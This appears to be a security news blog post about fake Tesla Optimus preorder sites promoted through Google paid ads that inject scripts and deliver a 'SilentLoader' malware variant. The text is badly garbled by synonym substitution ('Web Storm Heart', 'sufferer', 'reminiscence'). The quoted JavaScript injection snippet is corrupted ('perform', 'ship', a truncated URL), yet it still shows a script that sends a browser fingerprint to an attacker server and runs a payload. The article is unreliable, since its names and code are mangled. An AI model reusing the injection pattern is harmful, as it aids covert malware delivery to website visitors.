Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Hackers Poison Google Paid Ads With Fake Tesla Websites to Deliver Malware

Posted on August 11, 2025August 11, 2025 By CWS

In current weeks, a flurry of sponsored listings promising preorders for Tesla’s anticipated Optimus robots started showing on the prime of Google search outcomes.

These commercials directed unsuspecting customers to counterfeit microsites mimicking Tesla’s design, purporting to simply accept $250 “non-refundable” deposits for early entry to the robotics platform.

What appeared at first look to be a routine phishing rip-off has developed into a much more insidious operation: hackers have weaponized these faux Tesla touchdown pages to distribute customized malware payloads.

Web Storm Heart analysts famous that the marketing campaign first surfaced round early August, following Tesla’s personal promotional supplies that reignited public curiosity in Optimus.

Optimus Tesla preorder (Supply – Web Storm Heart)

By registering domains equivalent to offers-tesla.com and exclusive-tesla.com, the menace actors sidestepped conventional e mail filters and social media monitoring, relying as a substitute on Google’s promoting platform to make sure most visibility.

Victims clicking via these paid advertisements encountered an ostensibly official preorder type, unaware that behind the scenes malicious scripts had been being silently injected.

Upon type submission, relatively than charging the take a look at bank card offered, the location responded with JavaScript designed to fingerprint the customer’s browser and obtain a second-stage loader.

Web Storm Heart researchers recognized this loader as a variant of the extensively noticed “SilentLoader” household, configured to fetch extra modules from the actor-controlled area caribview.information.

Evaluation of community visitors revealed HTTP POST requests delivering encrypted configuration blobs, which the loader then decrypted and executed in reminiscence—leaving no executable on disk.

An infection Mechanism Deep Dive

The an infection mechanism hinges on dynamic script injection and in-memory execution to evade detection. When the sufferer’s browser renders the faux Tesla web page, the next snippet is dynamically appended to the checkout web page:-

(perform(){
var xhr = new XMLHttpRequest();
xhr.open(‘POST’, ‘ true);
xhr.onload = perform(){
var cipher = new Uint8Array(xhr.response);
var config = decryptConfig(cipher, key);
executePayload(config.loaderUrl);
};
xhr.responseType=”arraybuffer”;
xhr.ship(collectBrowserFingerprint());
})();

This code leverages the browser’s native capabilities to collect system particulars—equivalent to put in fonts, display decision, and plugin variations—then posts the fingerprint to the malicious API.

Presents-tesla.com checkout web page illustrating malicious script injection (Supply – Web Storm Heart)

The encrypted response accommodates each the URL of the secondary payload and a crypto key, guaranteeing that signature-based defenses stay blind to the true nature of the obtain.

As soon as in reminiscence, the loader initiates a reflective DLL injection into the sufferer’s browser course of, granting full code execution privileges with out writing to disk.

Equip your SOC with full entry to the most recent menace information from ANY.RUN TI Lookup that may Enhance incident response -> Get 14-day Free Trial

Cyber Security News Tags:Ads, Deliver, Fake, Google, Hackers, Malware, Paid, Poison, Tesla, Websites

Post navigation

Previous Post: Chrome Sandbox Escape Earns Researcher $250,000
Next Post: Researchers Spot Surge in Erlang/OTP SSH RCE Exploits, 70% Target OT Firewalls

Related Posts

Windows Task Scheduler Vulnerability Let Attackers Escalate Privileges Cyber Security News
Adobe Photoshop Vulnerability Let Attackers Execute Arbitrary Code Cyber Security News
WAFs protection Bypassed to Execute XSS Payloads Using JS Injection with Parameter Pollution Cyber Security News
Threat Actors Exploiting Ivanti Connect Secure Vulnerabilities to Deploy Cobalt Strike Beacon Cyber Security News
New AI-Powered Wi-Fi Biometrics WhoFi Tracks Humans Behind Walls with 95.5% Accuracy Cyber Security News
Firefox 141 Released With Fix for Multiple Vulnerabilities Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • How to Secure Your GitHub Repositories
  • CISA Added WinRaR Zero-Day (CVE-2025-8088) Vulnerability That is Actively Exploited In the Wild
  • Microsoft Removes PowerShell 2.0  from Windows To Clean up Legacy Code
  • Norwegian Police Say Pro-Russian Hackers Were Likely Behind Suspected Sabotage at a Dam
  • New ‘Curly COMrades’ APT Hackers Attacking Targeting Critical Organizations in Countries

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • How to Secure Your GitHub Repositories
  • CISA Added WinRaR Zero-Day (CVE-2025-8088) Vulnerability That is Actively Exploited In the Wild
  • Microsoft Removes PowerShell 2.0  from Windows To Clean up Legacy Code
  • Norwegian Police Say Pro-Russian Hackers Were Likely Behind Suspected Sabotage at a Dam
  • New ‘Curly COMrades’ APT Hackers Attacking Targeting Critical Organizations in Countries

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News